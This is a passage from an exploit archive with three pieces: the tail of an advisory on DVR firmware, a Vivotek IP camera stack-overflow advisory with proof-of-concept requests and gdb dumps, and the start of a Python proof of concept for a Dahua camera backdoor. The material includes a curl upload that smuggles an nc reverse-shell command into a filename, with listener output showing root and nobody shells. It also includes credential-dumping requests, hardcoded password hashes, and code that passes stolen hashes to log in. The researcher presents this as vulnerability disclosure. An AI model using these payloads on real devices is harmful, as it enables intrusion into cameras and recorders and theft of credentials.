Ncat: Version 7.60 ( https://nmap.org/ncat )
|
||||
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
|
||||
Ncat: SHA-1 fingerprint: E672 0A5B B852 8EF9 36D0 E979 2827 1FAD 7482 8A7B
|
||||
Ncat: Listening on :::31337
|
||||
Ncat: Listening on 0.0.0.0:31337
|
||||
|
||||
Ncat: Connection from 192.168.57.20.
|
||||
Ncat: Connection from 192.168.57.20:36356.
|
||||
|
||||
pwd
|
||||
/opt/fw
|
||||
|
||||
whoami
|
||||
root
|
||||
exit
|
||||
$
|
||||
|
||||
Note:
|
||||
1. Badbytes: 0x00,0x09,0x0a,0x0b,0x0c,0x0d,0x20
|
||||
2. 0x20 will be replaced with 0x00 by the H4/H1/N1 binary, use this to jump binary included system() address: 0x00114AC8 [system() call in H4]
|
||||
3. 0x02739A0C + 0x74 = $r11 address we need (0x2739A80) to point our CMD string on heap for system() in $r0
|
||||
|
||||
H1:
|
||||
VT-HDOC4E_Firmware_1.21A_UI_1.1.C.6
|
||||
.rodata:005292E8 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
|
||||
.text:001CD138 SUB R3, R11, #0x74
|
||||
.text:001CD13C MOV R0, R3
|
||||
.text:001CD140 BL system
|
||||
|
||||
H4:
|
||||
VT-HDOC16BR_Firmware_1.02Y_UI_1.0.1.R
|
||||
.rodata:00B945A0 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
|
||||
.text:00114AC8 SUB R3, R11, #0x74
|
||||
.text:00114ACC MOV R0, R3
|
||||
.text:00114AD0 BL system
|
||||
|
||||
N1:
|
||||
VT-HDOC8E_Firmware_1.21E_UI_1.1.C.6
|
||||
.rodata:004A4AC4 aEchoSOptVideoS DCB "echo %s > /opt/video_standard",0
|
||||
.text:001E9F0C SUB R3, R11, #0x74
|
||||
.text:001E9F10 MOV R0, R3
|
||||
.text:001E9F14 BL system
|
||||
|
||||
|
||||
-[PHP RCE]-
|
||||
|
||||
Note: /mnt/usb2 must be mounted and R/W... (normally R/O w/o USB stick inserted)
|
||||
|
||||
[Reverse netcat shell (forking)]
|
||||
|
||||
$ curl -v 'http://192.168.57.20:80/cgi-bin/php/htdocs/system/upload_check.php' -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1337" -d "`echo -en "\r\n\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n100000000\r\n------WebKitFormBoundary1337\r\nContent-Disposition: form-data; name=\"userfile\"; filename=\"\|\|nc\$\{IFS\}\$\{REMOTE_ADDR\}\$\{IFS\}31337\$\{IFS\}-e\$\{IFS\}sh\$\{IFS\}\&\$\{IFS\}\|\|\"\r\nContent-Type: application/gzip\r\n\r\nPWNED\r\n\r\n------WebKitFormBoundary1337--\r\n\r\n"`" -X POST
|
||||
|
||||
200 OK
|
||||
[...]
|
||||
> ERROR : Current_fw_info File Open Error<br>> ERROR : dvr_upgrade File Open Error<br>F/W File(||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||) Upload Completed.<br>If you want to upgrade please click START button<br><br><form enctype="multipart/form-data" action="fw_update.php" method="post"><input type="hidden" name="PHPSESSID" value="67eaa14441089e5d2e7fe6ff0fa88d42" /><input type="submit" value="START"></form> </tbody>
|
||||
[...]
|
||||
|
||||
[Listener]
|
||||
|
||||
$ ncat -vlp 31337
|
||||
Ncat: Version 7.60 ( https://nmap.org/ncat )
|
||||
Ncat: Generating a temporary 1024-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
|
||||
Ncat: SHA-1 fingerprint: 76D3 7FA3 396A B9F6 CCA6 CEA5 2EF8 06DF FF72 79EF
|
||||
Ncat: Listening on :::31337
|
||||
Ncat: Listening on 0.0.0.0:31337
|
||||
Ncat: Connection from 192.168.57.20.
|
||||
Ncat: Connection from 192.168.57.20:52726.
|
||||
|
||||
pwd
|
||||
/opt/www/htdocs/system
|
||||
|
||||
whoami
|
||||
nobody
|
||||
|
||||
ls -l /mnt/usb2/
|
||||
total 4
|
||||
drwxrwxrwx 2 nobody nobody 0 Dec 16 02:55 dvr
|
||||
-rw------- 1 nobody nobody 7 Dec 16 02:55 ||nc${IFS}${REMOTE_ADDR}${IFS}31337${IFS}-e${IFS}sh${IFS}&${IFS}||
|
||||
exit
|
||||
$
|
||||
|
||||
-[Login / Password Disclosure]-
|
||||
|
||||
curl -v "http://192.168.57.20:80/menu.env" | hexdump -C
|
||||
[binary config, login and password can be found for admin login and all connected cameras]
|
||||
|
||||
Admin l/p
|
||||
[...]
|
||||
00001380 00 00 00 00 01 01 00 01 01 01 01 00 00 00 00 00 |................|
|
||||
00001390 00 00 00 00 00 41 44 4d 49 4e 00 00 00 00 00 00 |.....ADMIN......|
|
||||
000013a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
|
||||
*
|
||||
00001400 00 00 00 00 00 00 00 00 00 00 00 00 00 00 31 32 |..............12|
|
||||
00001410 33 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |34..............|
|
||||
00001420 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
|
||||
|
||||
Cameras l/p
|
||||
[...]
|
||||
00008d80 00 00 00 00 c0 00 a8 00 01 00 15 00 92 1f 00 00 |................|
|
||||
00008d90 91 1f 00 00 72 6f 6f 74 00 00 00 00 00 00 00 00 |....root........|
|
||||
00008da0 00 00 00 00 70 61 73 73 00 00 00 00 00 00 00 00 |....pass........|
|
||||
00008db0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
|
||||
00008dc0 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 a8 00 |................|
|
||||
00008dd0 01 00 16 00 94 1f 00 00 93 1f 00 00 72 6f 6f 74 |............root|
|
||||
00008de0 00 00 00 00 00 00 00 00 00 00 00 00 70 61 73 73 |............pass|
|
||||
00008df0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
|
||||
|
||||
-[Hardcode l/p]-
|
||||
FTP: TCP/10021
|
||||
TELNET: TCP/10023
|
||||
|
||||
/etc/passwd
|
||||
root:$1$5LFGqGq.$fUozHRdzvapI2qBf1EeoJ0:0:0:root:/root:/bin/sh
|
||||
woody:$1$e0vY7A0V$BjS38SsHNWC5DxEGlzuEP1:1001:100:woohyun digital user:/home/woody:/bin/sh
|
||||
|
||||
-[Korean hardcoded DNS]-
|
||||
$ cat /etc/resolv.conf
|
||||
nameserver 168.126.63.1
|
||||
nameserver 0.0.0.0
|
||||
nameserver 0.0.0.0
|
||||
$
|
||||
|
||||
$ nslookup 168.126.63.1
|
||||
1.63.126.168.in-addr.arpa name = kns.kornet.net.
|
||||
$ nslookup 168.126.63.2
|
||||
2.63.126.168.in-addr.arpa name = kns2.kornet.net.
|
||||
|
||||
|
||||
-[Other Information Disclosure]-
|
||||
curl -v "http://192.168.57.20:80/webviewer/netinfo.dat"
|
||||
192,168,57,20
|
||||
192,168,2,100
|
||||
00:0A:2F:XX:XX:XX
|
||||
00:0A:2F:YY:YY:YY
|
||||
255.255.255.0
|
||||
192.168.57.1
|
||||
|
||||
-[MAC Address Details]-
|
||||
Company: Artnix Inc.
|
||||
Address: Seoul 137-819, KOREA, REPUBLIC OF
|
||||
Range: 00:0A:2F:00:00:00 - 00:0A:2F:FF:FF:FF
|
||||
Type: IEEE MA-L
|
||||
|
||||
curl -v "http://192.168.57.20:80/webviewer/gw.dat"
|
||||
Kernel IP routing table
|
||||
Destination Gateway Genmask Flags Metric Ref Use Iface
|
||||
192.168.2.0 0.0.0.0 255.255.255.0 U 0 0 0 eth1
|
||||
192.168.57.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
|
||||
0.0.0.0 192.168.57.1 0.0.0.0 UG 0 0 0 eth0
|
||||
|
||||
curl -v "http://192.168.57.20:80/cgi-bin/php/lang_change.php?lang=0"
|
||||
Change GUI Language to English
|
||||
|
||||
[... and more]
|
||||
|
||||
[ETX]
|
143
exploits/multiple/remote/44001.txt
Normal file
143
exploits/multiple/remote/44001.txt
Normal file
|
@ -0,0 +1,143 @@
|
|||
[STX]
|
||||
|
||||
Subject: Vivotek IP Cameras - Remote Stack Overflow
|
||||
Researcher: bashis <mcw noemail eu> (September-October 2017)
|
||||
PoC: https://github.com/mcw0/PoC
|
||||
Release date: November 13, 2017
|
||||
Full Disclosure: 43 days
|
||||
|
||||
Attack Vector: Remote
|
||||
Authentication: Anonymous (no credentials needed)
|
||||
Firmware Vulnerable: Only 2017 versions affected
|
||||
Firmware Patched: October 2017 and higher
|
||||
|
||||
Device Model:
|
||||
CC8160, CC8370, CC8371, CD8371, FD8166A, FD8166A, FD8166A-N, FD8167A, FD8167A, FD8167AS,
|
||||
FD8167AS, FD8169A, FD8169A, FD8169A, FD8169AS, FD8169AS, FD816B, FD816B, FD816BA, FD816BA,
|
||||
FD816C, FD816C, FD816CA, FD816CA, FD816D, FD8177, FD8179, FD8182, FD8182, FD8182-F1,
|
||||
FD8365A_v2, FD8367A, FD8367A, FD8369A, FD8369A, FD836B, FD836BA, FD836D, FD8377, FD8379,
|
||||
FD8382, FD9171, FD9181, FD9371, FD9381, FE8174_v2, FE8181_v2, FE8182, FE8374_v2, FE8381_v2,
|
||||
FE9181, FE9182, FE9381, FE9382, IB8367A, IB8369A, IB836B, IB836BA, IB836D, IB8377,
|
||||
IB8379, IB8382, IB9371, IB9381, IP8166, IP9171, IP9181, IZ9361, MD8563, MD8564,
|
||||
MD8565, SD9161, SD9361, SD9362, SD9363, SD9364, SD9365, SD9366, VC8101... and possible more
|
||||
|
||||
Download Updated Firmware: http://www.vivotek.com/firmware/
|
||||
|
||||
|
||||
[Timeline]
|
||||
|
||||
October 1, 2017: Reported findings with all details to Vivotek Cybersecurity
|
||||
October 2, 2017: First response from Vivotek
|
||||
October 5, 2017: ACK of findings from Vivotek
|
||||
October 11, 2017: Vivotek reported first fixed Firmware
|
||||
October 12, 2017: After request, Vivotek provided samples of fixed Firmware
|
||||
October 17, 2017: Verified fixed Firmware, Vivotek thanking for the help
|
||||
October 30, 2017: Noticed new Firmware released, pinged to get some info about their advisory
|
||||
November 1, 2017: Agreed on publication November 13, 2017
|
||||
November 9, 2017: Checked few release notes, none mention security fix; pinged Vivotek with the question why not.
|
||||
November 13, 2017: No reply from Vivotek, Full Disclosure as planned.
|
||||
|
||||
|
||||
[Details]
|
||||
|
||||
Vivotek using modified version of Boa/0.94.14rc21, and the vulnerability has been introduced by Vivotek.
|
||||
|
||||
The stack overflow is triggered by "PUT" or "POST" request:
|
||||
|
||||
[PUT|POST] /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n
|
||||
|
||||
However,
|
||||
the absolutely minimal request to trigger the stack overflow is weird, most probably due to quick hack:
|
||||
"[PUT|POST]Content-Length:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n"
|
||||
|
||||
This allows us to insert [JUNK] with 'Good bytes' up to 9182 bytes (0x1FFF) of the request:
|
||||
"[PUT|POST][JUNK]Content-Length[JUNK]:[20 bytes garbage]BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n"
|
||||
|
||||
|
||||
Notes:
|
||||
1. B to I = $R4-$R11; X = $PC
|
||||
2. Size of request availible in $R3 at the LDMFD
|
||||
3. Max request size: 9182 bytes (0x1FFF)
|
||||
4. "Start with "\n" in "\n\r\n\r\n" needed to jump with 0x00xxxxxx (if not $PC will be 0x0dxxxxxx)
|
||||
5. Space (0x20) after ':' in 'Content-Length:' counting as one char of the 20 bytes
|
||||
6. Stack not protected with "Stack canaries"
|
||||
7. Good bytes: 0x01-0x09, 0x0b-0xff; Bad bytes: 0x00, 0x0a;
|
||||
8. heap: Non-executable + Non-ASLR
|
||||
9. stack: Non-executable + ASLR
|
||||
|
||||
|
||||
[PoC]
|
||||
|
||||
$ echo -en "POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80
|
||||
|
||||
(gdb) target remote 192.168.57.20:23946
|
||||
Remote debugging using 192.168.57.20:23946
|
||||
0x76eb2c5c in ?? ()
|
||||
(gdb) c
|
||||
Continuing.
|
||||
|
||||
Program received signal SIGSEGV, Segmentation fault.
|
||||
0x58585858 in ?? ()
|
||||
(gdb) bt
|
||||
#0 0x58585858 in ?? ()
|
||||
#1 0x000188f4 in ?? ()
|
||||
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
|
||||
(gdb) i reg
|
||||
r0 0x1 1
|
||||
r1 0x47210 291344
|
||||
r2 0x0 0
|
||||
r3 0x75 117
|
||||
r4 0x42424242 1111638594
|
||||
r5 0x43434343 1128481603
|
||||
r6 0x44444444 1145324612
|
||||
r7 0x45454545 1162167621
|
||||
r8 0x46464646 1179010630
|
||||
r9 0x47474747 1195853639
|
||||
r10 0x48484848 1212696648
|
||||
r11 0x49494949 1229539657
|
||||
r12 0x1 1
|
||||
sp 0x7e92dac0 0x7e92dac0
|
||||
lr 0x188f4 100596
|
||||
pc 0x58585858 0x58585858
|
||||
cpsr 0x60000010 1610612752
|
||||
(gdb)
|
||||
|
||||
|
||||
$ echo -en "PUTContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n" | ncat -v 192.168.57.20 80
|
||||
|
||||
(gdb) target remote 192.168.57.20:23946
|
||||
Remote debugging using 192.168.57.20:23946
|
||||
0x76e82c5c in ?? ()
|
||||
(gdb) c
|
||||
Continuing.
|
||||
|
||||
Program received signal SIGSEGV, Segmentation fault.
|
||||
0x58585858 in ?? ()
|
||||
(gdb) bt
|
||||
#0 0x58585858 in ?? ()
|
||||
#1 0x000188f4 in ?? ()
|
||||
Backtrace stopped: previous frame identical to this frame (corrupt stack?)
|
||||
(gdb) i reg
|
||||
r0 0x1 1
|
||||
r1 0x47210 291344
|
||||
r2 0x0 0
|
||||
r3 0x4f 79
|
||||
r4 0x42424242 1111638594
|
||||
r5 0x43434343 1128481603
|
||||
r6 0x44444444 1145324612
|
||||
r7 0x45454545 1162167621
|
||||
r8 0x46464646 1179010630
|
||||
r9 0x47474747 1195853639
|
||||
r10 0x48484848 1212696648
|
||||
r11 0x49494949 1229539657
|
||||
r12 0x1 1
|
||||
sp 0x7ec9cac0 0x7ec9cac0
|
||||
lr 0x188f4 100596
|
||||
pc 0x58585858 0x58585858
|
||||
cpsr 0x60000010 1610612752
|
||||
(gdb)
|
||||
|
||||
Have a nice day
|
||||
/bashis
|
||||
|
||||
[ETX]
|
663
exploits/multiple/remote/44002.py
Executable file
663
exploits/multiple/remote/44002.py
Executable file
|
@ -0,0 +1,663 @@
|
|||
#!/usr/bin/python2.7
|
||||
|
||||
if False: '''
|
||||
|
||||
2017-05-03
|
||||
|
||||
Public rerelease of Dahua Backdoor PoC
|
||||
https://github.com/mcw0/PoC/blob/master/dahua-backdoor-PoC.py
|
||||
|
||||
2017-03-20
|
||||
|
||||
With my newfound knowledge of vulnerable devices out there with an unbelievable number of more than 1 million Dahua / OEM units, where knowledge comes from a report made by NSFOCUS and my own research on shodan.io.
|
||||
|
||||
With this knowledge, I will not release the Python PoC to the public as before said of April 5, as it is not necessary when the PoC has already been verified by IPVM and other independent security researchers.
|
||||
|
||||
However, I'm open to share the PoC with serious security researchers if so desired, please e-mail me off list and be clear about who you are so I do not take you for a beggar, which I ignore.
|
||||
|
||||
NSFOCUS report: http://blog.nsfocus.net/dahua-cameras-unauthorized-access-vulnerability-technical-analysis-solution/
|
||||
|
||||
/bashis
|
||||
|
||||
|
||||
[STX]
|
||||
|
||||
I'm speechless, and almost don't know what I should write... I (hardly) can't believe what I have just found.
|
||||
|
||||
I have just discovered (to what I strongly believe is backdoor) in Dahua DVR/NVR/IPC and possible all their clones.
|
||||
|
||||
Since I am convinced this is a backdoor, I have my own policy to NOT notify the vendor before the community.
|
||||
(I simply don't want to listen on their poor excuses, their tryings to keep me silent for informing the community)
|
||||
|
||||
In short:
|
||||
You can delete/add/change name on the admin users, you change password on the admin users - this backdoor simply don't care about that!
|
||||
It uses whatever names and passwords you configuring - by simply downloading the full user database and use your own credentials!
|
||||
|
||||
This is so simple as:
|
||||
1. Remotely download the full user database with all credentials and permissions
|
||||
2. Choose whatever admin user, copy the login names and password hashes
|
||||
3. Use them as source to remotely login to the Dahua devices
|
||||
|
||||
This is like a damn Hollywood hack, click on one button and you are in...
|
||||
|
||||
|
||||
Below PoC you will find here: https://github.com/mcw0/PoC/dahua-backdoor.py
|
||||
Update:
|
||||
Dahua has requested me to temporally remove the PoC code, will be back here again 5th April. (30 days)
|
||||
/Sorry, bashis
|
||||
|
||||
Please have understanding of the quick hack of the PoC, I'm sure it could be done better.
|
||||
|
||||
Have a nice day
|
||||
/bashis
|
||||
|
||||
$ ./dahua-backdoor.py --rhost 192.168.5.2
|
||||
|
||||
[*] [Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]
|
||||
|
||||
[i] Remote target IP: 192.168.5.2
|
||||
[i] Remote target PORT: 80
|
||||
[>] Checking for backdoor version
|
||||
[<] 200 OK
|
||||
[!] Generation 2 found
|
||||
[i] Chosing Admin Login: 888888, PWD hash: 4WzwxXxM
|
||||
[>] Requesting our session ID
|
||||
[<] 200 OK
|
||||
[>] Logging in
|
||||
[<] 200 OK
|
||||
{ "id" : 10000, "params" : null, "result" : true, "session" : 100385023 }
|
||||
|
||||
[>] Logging out
|
||||
[<] 200 OK
|
||||
|
||||
[*] All done...
|
||||
$
|
||||
|
||||
$ ./dahua-backdoor.py --rhost 192.168.5.3
|
||||
|
||||
[*] [Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]
|
||||
|
||||
[i] Remote target IP: 192.168.5.3
|
||||
[i] Remote target PORT: 80
|
||||
[>] Checking for backdoor version
|
||||
[<] 200 OK
|
||||
[!] Generation 3 Found
|
||||
[i] Choosing Admin Login: admin, Auth: 27
|
||||
[>] Requesting our session ID
|
||||
[<] 200 OK
|
||||
[i] Downloaded MD5 hash: 94DB0778856B11C0D0F5455CCC0CE074
|
||||
[i] Random value to encrypt with: 1958557123
|
||||
[i] Built password: admin:1958557123:94DB0778856B11C0D0F5455CCC0CE074
|
||||
[i] MD5 generated password: 2A5F4F7E1BB6F0EA6381E4595651A79E
|
||||
[>] Logging in
|
||||
[<] 200 OK
|
||||
{ "id" : 10000, "params" : null, "result" : true, "session" : 1175887285 }
|
||||
|
||||
[>] Logging out
|
||||
[<] 200 OK
|
||||
|
||||
[*] All done...
|
||||
$
|
||||
|
||||
[ETX]
|
||||
'''
|
||||
|
||||
|
||||
#
|
||||
# Dahua backdoor PoC Generation 2 and 3
|
||||
# Author: bashis <mcw noemail eu> March 2017
|
||||
# Credentials: No Credentials needed (Exploited as Anonymous)
|
||||
# Note: PoC intentionally missing essential details to be direct usable for anything else than login/logout.
|
||||
#
|
||||
# Vendor URL: http://www.dahuasecurity.com/
|
||||
#
|
||||
# Patched firmware can be downloaded from newly introduced 'Firmware download function'
|
||||
# (Don't mind the old date stamps, these should all be the hotfixed updates)
|
||||
# http://www.dahuasecurity.com/download_111.html
|
||||
#
|
||||
#
|
||||
# -[ Facts ]-
|
||||
#
|
||||
# 1) Requirements
|
||||
# 1.1) You need to know what you want to request
|
||||
# 1.2) You need to know how to request what you want
|
||||
# - When you know this, remote device will give you what you want, without any complains
|
||||
# 1.3) You need to know how to process the results of your requests
|
||||
# 1.4) You need to know how to send your processed results back to remote device
|
||||
# - When you know this, you will be granted full access to remote device, without any complains
|
||||
#
|
||||
# 2) Direct file access
|
||||
# 2.1) /mnt/mtd/Config/{passwd|Account1} downloadable with /current_config/{passwd|Account1} by HTTP/HTTPS
|
||||
# 2.2) User database hash in format: <username>:<realm>:<password>
|
||||
# 2.3) /mnt/mtd are read/writable - so sensitive files could (must!) be somewhere else, protected, and not remotely accessible.
|
||||
# 2.4) /mnt/mtd/Config contains also of intentionally public accessible files (WebCapConfig and preLanguage)
|
||||
# 2.5) There is several other files that should (must!) not be remotely accessible either (Config1 for example)
|
||||
#
|
||||
# 3) Passing the hash
|
||||
# 3.1) Generation 1 - Base64 encoded (Not in this PoC, since I don't know what I want to request, but I could guess same format as 2.2)
|
||||
# 3.2) Generation 2 - No processing needed; only to pass on the hash
|
||||
# 3.3) Generation 3 - New 'improved' MD5 random hash must be generated with additional details, that we simply requesting from remote
|
||||
# 3.4) New MD5 random hash has to be generated as: <username>:<random>:[MD5 format as in user database (2.2)]
|
||||
#
|
||||
# - Not less than three times, Dahua have been poking around in the file structure and in the relevant functions of the source code
|
||||
# - Changed file names, structure of user database, added/removed both public and sensitive files.
|
||||
# - And never once wondered;
|
||||
# 1. 'Hm, why I'm allowed to access these newly added files without login request?'
|
||||
# 2. 'Hm, I know that file is the user database, can I access that one too without login request?'
|
||||
# 3. 'Hm, I know that file is the device config, can I access that one too without login request?'
|
||||
# - Really? Are you kidding me?
|
||||
#
|
||||
# When you know all above, and have full access to remote device, the whole thing looks so easy, actually way too easy to be true.
|
||||
#
|
||||
#
|
||||
# -[ Most importantly ]-
|
||||
#
|
||||
# 1) Undocumented direct access to certain file structures, and used from some of Dahuas own .js to load 'WebCapConfig' and 'preLanguage'
|
||||
# 2) Direct and indirect re-usage of hashes possible, however with MD5 hash 'security improvements' in Generation 3
|
||||
# 3) Essential needs for successful login we simply request from remote device and process, no need to guess nor bruteforce anything
|
||||
# 4) Abnormally wide range of products and firmware versions that share same reliable attack method, to be 'just an vulnerability'
|
||||
# - True vulnerability over a wide range products and firmware versions have always some unexpected anomalies, which is expected
|
||||
# 5) Dahua has lots of debug code compiled into the Firmware that may/normally listening on TCP/6789, although protected by l/p authorization
|
||||
# - Dahua has been kindly asked to remove all debug code from production firmware, as this access and code do not belong in end user devices
|
||||
# 6) The admin account '888888' is claimed by Dahua to be limited for local login with 'monitor and mouse' only, and not from remote
|
||||
# - However, that validation is done locally in users browser by 'loginEx.js', and has therefore no practical effect
|
||||
# 7) The 'hotfix' remediation was done by hardcoding from full access to two intentionally public accessible files (WebCapConfig and preLanguage)
|
||||
#
|
||||
#
|
||||
# -[ Did Dahua confirm the backdoor by mistake? ]-
|
||||
#
|
||||
# Don't know if you noticed that the 'new' patches that was pushed out days after my initital post at IPVM,
|
||||
# they had different old date stamps, and same old date stamps (as on the archives) was on all inside binaries as well.
|
||||
#
|
||||
# Screenshots
|
||||
# https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20Timestamp.png
|
||||
# https://github.com/mcw0/PoC/blob/master/Dahua%20Wiki%20Firmware%20listing.png
|
||||
#
|
||||
# URL
|
||||
# http://us.dahuasecurity.com/en/us/Security-Bulletin_030617.php
|
||||
# https://dahuawiki.com/images/Firmware/DVR/Q2.2017/
|
||||
#
|
||||
# And, bit interesting, Dahua continued to use old date stamps on newly generated firmware updates/hotfixes
|
||||
#
|
||||
# -[ Method of discovery ]-
|
||||
#
|
||||
# Researching by dissasembling of Dahuas main binaries 'Challenge' / 'Sonia'
|
||||
# What got me curios, was abnormally empty inside of the image I was initally checking, and of course the big binary 'Challenge'
|
||||
# What got me on track, was the lack of references to sensitive files
|
||||
# Missing user database and Config in the archives, only a unused and read-only /etc/passwd was found
|
||||
# Noticed that sensitive files was generated by the binary at startup
|
||||
# Noticed checkings after sensitive files in different directories, to use 'defaults' as last resource
|
||||
# Noticed the mix of intentionally public files and sensitive files in same directory
|
||||
# Reading of the .htm and .js that was found in the image
|
||||
# ...etc.
|
||||
#
|
||||
#
|
||||
# -[ My Full Disclosure Policy ]-
|
||||
#
|
||||
# Normal vulnerabilites: I collect enough information about my findings and trying to notify the vendor to have coordinated disclosure
|
||||
# Backdoors: If/when they are intended, the vendors wants to hide/keep them (of course), what would you suggest? Notify the vendor or Full Disclosure?
|
||||
# Proof of claim: Screenshots or some Youtube video would not proof anything, so the claim couldn't be posted without real hard cold facts
|
||||
# - Professionals within the CCTV industry needed to know, and the only place I knew were many of them, was at IPVM, and therefore the first post was made there.
|
||||
#
|
||||
#
|
||||
# -[ Next Generation Backdoors ]-
|
||||
#
|
||||
# That is in my opinion vendors P2P Cloud solutions.
|
||||
#
|
||||
# With P2P, these kind of backdoor implementations as shown in this PoC will then not be needed,
|
||||
# since with P2P you practically giving away your credentials and addresses to your devices!
|
||||
# And the connection to P2P, your devices initiates and keeps open. (For me, it is similar to reverse shell)
|
||||
#
|
||||
#
|
||||
# -[ Hat's ]-
|
||||
#
|
||||
# I don't wear hats, I wear caps... (when it's cold)
|
||||
#
|
||||
#
|
||||
# -[ Function of this PoC code ]-
|
||||
#
|
||||
# 1) Check and dump the remote user database (Generation 2 or 3)
|
||||
# 2) Find first availible admin user and extract their login/pwd hash
|
||||
# 3) Request session ID, compute new hash if needed (Generation 3)
|
||||
# 4) Login and logout to/from remote device
|
||||
#
|
||||
#
|
||||
# -[ Credits ]-
|
||||
#
|
||||
# binwalk (https://github.com/devttys0/binwalk)
|
||||
# - Nothing easy could been done without binwalk, awesome tool. Thanks!
|
||||
#
|
||||
# IPVM (https://ipvm.com/)
|
||||
# - For pickup of the claim and to make PoC report, so this Python PoC could be taken down.
|
||||
#
|
||||
# Full Disclosure (http://seclists.org/fulldisclosure/)
|
||||
# - For existing, without your e-mail list, sensitive stuff would be quite difficult to uncover.
|
||||
# - Fyodor, thanks again.
|
||||
#
|
||||
# And, big thanks to all authors for all other stuff and tools that's needed to successfully execute research within binaries
|
||||
# - To many for naming.
|
||||
#
|
||||
# Have a nice day
|
||||
# /bashis
|
||||
#
|
||||
|
||||
import string
|
||||
import sys
|
||||
import socket
|
||||
import argparse
|
||||
import urllib, urllib2, httplib
|
||||
import base64
|
||||
import ssl
|
||||
import json
|
||||
import commentjson # pip install commentjson
|
||||
import hashlib
|
||||
|
||||
class HTTPconnect:
|
||||
|
||||
def __init__(self, host, proto, verbose, creds, Raw):
|
||||
self.host = host
|
||||
self.proto = proto
|
||||
self.verbose = verbose
|
||||
self.credentials = creds
|
||||
self.Raw = Raw
|
||||
|
||||
def Send(self, uri, query_headers, query_data,ID):
|
||||
self.uri = uri
|
||||
self.query_headers = query_headers
|
||||
self.query_data = query_data
|
||||
self.ID = ID
|
||||
|
||||
# Connect-timeout in seconds
|
||||
timeout = 5
|
||||
socket.setdefaulttimeout(timeout)
|
||||
|
||||
url = '{}://{}{}'.format(self.proto, self.host, self.uri)
|
||||
|
||||
if self.verbose:
|
||||
print "[Verbose] Sending:", url
|
||||
|
||||
if self.proto == 'https':
|
||||
if hasattr(ssl, '_create_unverified_context'):
|
||||
print "[i] Creating SSL Unverified Context"
|
||||
ssl._create_default_https_context = ssl._create_unverified_context
|
||||
|
||||
if self.credentials:
|
||||
Basic_Auth = self.credentials.split(':')
|
||||
if self.verbose:
|
||||
print "[Verbose] User:",Basic_Auth[0],"Password:",Basic_Auth[1]
|
||||
try:
|
||||
pwd_mgr = urllib2.HTTPPasswordMgrWithDefaultRealm()
|
||||
pwd_mgr.add_password(None, url, Basic_Auth[0], Basic_Auth[1])
|
||||
auth_handler = urllib2.HTTPBasicAuthHandler(pwd_mgr)
|
||||
opener = urllib2.build_opener(auth_handler)
|
||||
urllib2.install_opener(opener)
|
||||
except Exception as e:
|
||||
print "[!] Basic Auth Error:",e
|
||||
sys.exit(1)
|
||||
|
||||
if self.query_data:
|
||||
request = urllib2.Request(url, data=json.dumps(self.query_data), headers=self.query_headers)
|
||||
else:
|
||||
request = urllib2.Request(url, None, headers=self.query_headers)
|
||||
response = urllib2.urlopen(request)
|
||||
# print response
|
||||
if response:
|
||||
print "[<] {} OK".format(response.code)
|
||||
|
||||
if self.Raw:
|
||||
return response
|
||||
else:
|
||||
html = response.read()
|
||||
return html
|
||||
|
||||
|
||||
class Dahua_Backdoor:
|
||||
|
||||
def __init__(self, rhost, proto, verbose, creds, Raw):
|
||||
self.rhost = rhost
|
||||
self.proto = proto
|
||||
self.verbose = verbose
|
||||
self.credentials = creds
|
||||
self.Raw = Raw
|
||||
|
||||
#
|
||||
# Generation 2
|
||||
#
|
||||
def Gen2(self,response,headers):
|
||||
self.response = response
|
||||
self.headers = headers
|
||||
|
||||
html = self.response.readlines()
|
||||
if self.verbose:
|
||||
for lines in html:
|
||||
print "{}".format(lines)
|
||||
#
|
||||
# Check for first availible admin user
|
||||
#
|
||||
for line in html:
|
||||
if line[0] == "#" or line[0] == "\n":
|
||||
continue
|
||||
line = line.split(':')[0:25]
|
||||
if line[3] == '1': # Check if user is in admin group
|
||||
USER_NAME = line[1] # Save login name
|
||||
PWDDB_HASH = line[2]# Save hash
|
||||
print "[i] Choosing Admin Login [{}]: {}, PWD hash: {}".format(line[0],line[1],line[2])
|
||||
break
|
||||
|
||||
#
|
||||
# Login 1
|
||||
#
|
||||
print "[>] Requesting our session ID"
|
||||
query_args = {"method":"global.login",
|
||||
"params":{
|
||||
"userName":USER_NAME,
|
||||
"password":"",
|
||||
"clientType":"Web3.0"},
|
||||
"id":10000}
|
||||
|
||||
URI = '/RPC2_Login'
|
||||
response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.Raw).Send(URI,headers,query_args,None)
|
||||
|
||||
json_obj = json.load(response)
|
||||
if self.verbose:
|
||||
print json.dumps(json_obj,sort_keys=True,indent=4, separators=(',', ': '))
|
||||
|
||||
#
|
||||
